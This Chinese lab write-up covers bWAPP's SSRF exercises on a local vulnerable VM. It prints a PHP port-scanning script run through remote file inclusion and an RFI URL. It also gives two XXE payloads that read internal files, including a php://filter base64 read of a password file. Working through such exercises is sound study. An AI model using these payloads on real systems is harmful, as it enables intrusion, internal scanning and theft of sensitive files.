owasp -bwapp -ssrf练习
程序员文章站
2022-05-16 10:28:32
...
下载owasp虚拟机文件,打开后。用主机访问ip即可
进入bwapp
默认账号密码是bee/bug,靶机地址为http://192.168.111.129
http://192.168.111.129/bWAPP/ssrf.php
ssrf有三个任务
任务1:使用远程文件包含进行端口扫描
点击第一个测试得到
http://192.168.111.129/evil/ssrf-1.txt 是个端口扫描的脚本
找到
<?php
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";
if(isset($_REQUEST["ip"]))
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
$results = array();
foreach($ports as $port)
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
Remote & Local File Inclusion (RFI/LFI)
观察并修改地址,把刚刚的扫描txt地址,放进去
http://192.168.111.129/bWAPP/rlfi.php?language=http://192.168.111.129/evil/ssrf-1.txt&action=go
任务2:使用XXE获取敏感文件中的内容
点击第二个任务
得到两段XXE代码
# Accesses a file on the internal network (1)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "http://localhost/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
# Accesses a file on the internal network (2)
# Web pages returns some characters that break the XML schema > use the PHP base64 encoder filter to return an XML schema friendly version of the page!
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
来到xxe页面:http://192.168.111.129/bWAPP/xxe-1.php
使用post拦截,并修改下面的数据
通过第一段XXE代码获得 robots.txt
可以使用第二段代码,也可以改成自己想要的
任务3:使用XXE进行SmartTV的拒绝服务漏洞的利用(没有演示环境,使用SQL注入漏洞代替)
在任务2下,插入注入的payload
XXE知识可以看:
https://www.baidu.com/link?url=zPKGRhnhZYeBDjmswYRMTgoWQZc9aAfAdXxnfI8rNeJi_NITroI5EcuzaaOVjObH&wd=&eqid=cfd29284000a5f20000000065f773d31
https://www.cnblogs.com/zhaijiahui/p/9147595.html
推荐阅读